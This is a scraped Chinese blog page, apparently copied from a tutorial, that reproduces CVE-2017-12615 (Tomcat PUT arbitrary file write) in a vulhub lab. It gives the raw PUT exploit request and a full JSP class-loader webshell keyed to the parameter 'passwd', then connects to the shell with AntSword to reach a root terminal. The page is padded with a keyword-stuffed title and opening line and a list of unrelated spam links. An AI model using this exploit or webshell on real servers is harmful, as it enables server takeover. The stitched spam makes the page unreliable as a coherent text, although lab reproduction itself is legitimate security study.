当前位置: 首页 > news >正文

做一份网站的步zouwordpress自定义进入后台地址

做一份网站的步zou,wordpress自定义进入后台地址,wordpress关注功能怎么实现,vc 做网站源码Tomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。4.2.2 访问是否通,可以访…

Tomcat 任意写文件PUT方法 (CVE-2017-12615)

文章目录

    • Tomcat 任意写文件PUT方法 (CVE-2017-12615)
      • 1 在线漏洞解读:
      • 2 版本影响
      • 3 环境搭建
      • 4 漏洞复现
        • 4.1 访问
        • 4.2 POC攻击点
          • 4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
          • 4.2.2 访问是否通,可以访问到文件
      • 5 漏洞利用
        • 5.1 上传jsp一句话
        • 5.2 kali打开蚁剑:
        • 5.3 连接jsp一句话木马,密码为 passwd
        • 5.4 打开终端,获取root

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

在这里插入图片描述

2 版本影响

​ Tomcat version: 8.5.19

3 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2017-12615

在这里插入图片描述

环境启动:

sudo docker-compose up -dsudo docker ps -a

已启动:访问端口8091

在这里插入图片描述

4 漏洞复现

4.1 访问

​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

在这里插入图片描述
在这里插入图片描述

4.2 POC攻击点
4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell
4.2.2 访问是否通,可以访问到文件

在这里插入图片描述

5 漏洞利用

5.1 上传jsp一句话
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>
5.2 kali打开蚁剑:
┌──(kali💋kali)-[~]
└─$ sudo antsword 
5.3 连接jsp一句话木马,密码为 passwd

在这里插入图片描述

5.4 打开终端,获取root

在这里插入图片描述

http://www.yayakq.cn/news/23552/

相关文章:

  • 移动端网站 优帮云产品设计工资一般多少
  • 做网站文字居中代码做网站为什么要用固定ip
  • 福建微网站建设价格江门seo方法
  • 丰台网站制作浩森宇特免费游戏网站模板
  • 临西网站建设价格平台开发
  • 提供低价网站建设云南旅游网站建设公司
  • 整站下载工具软件松滋住房和城乡建设局网站
  • 石家庄网站建设专家网络彩票的网站怎么做
  • 推荐几个好的网站成都关键词
  • 站群cms源码政务公开网站建设的亮点和建议
  • 个人网站的色彩设计怎么做个人网站是什么意思
  • 在境外做网站网站松松软文平台
  • 公司网站怎么设计制作网络推广 网站制作
  • 动漫设计与制作难吗落实20条优化措施
  • 化妆品购物网站开发的意义网站建设系统总体结构功能图
  • 网站二级导航制作能被百度收录的建站网站
  • 网站会员功能网站首页上海网站建设公司
  • 东莞网站定制wordpress漏洞关键字
  • 网站功能项目报价嘉兴网页制作公司
  • 企业网站建设需求wordpress3教程
  • 静态网站被挂马售后服务规范网站建设
  • 网站全屏大图代码企业网站建设硬件
  • 汕头网站制作多少钱电子商务网站建设心得体会
  • 视频播放类网站建设费用宁夏建设厅网站查证
  • 灵璧县住房和城乡建设局网站中山网约车资格证报名地点
  • 程序员自己做网站赚钱求个网站你懂我意思是
  • 用网站做微信公众号无极任务平台网站进入
  • wordpress可以制作什么网站吗房地产销售造林种养殖加工承揽项目开发等招商广告
  • 农村自建房室内装修设计效果图首页优化公司
  • 凡科免费建站网站建设项目进度计划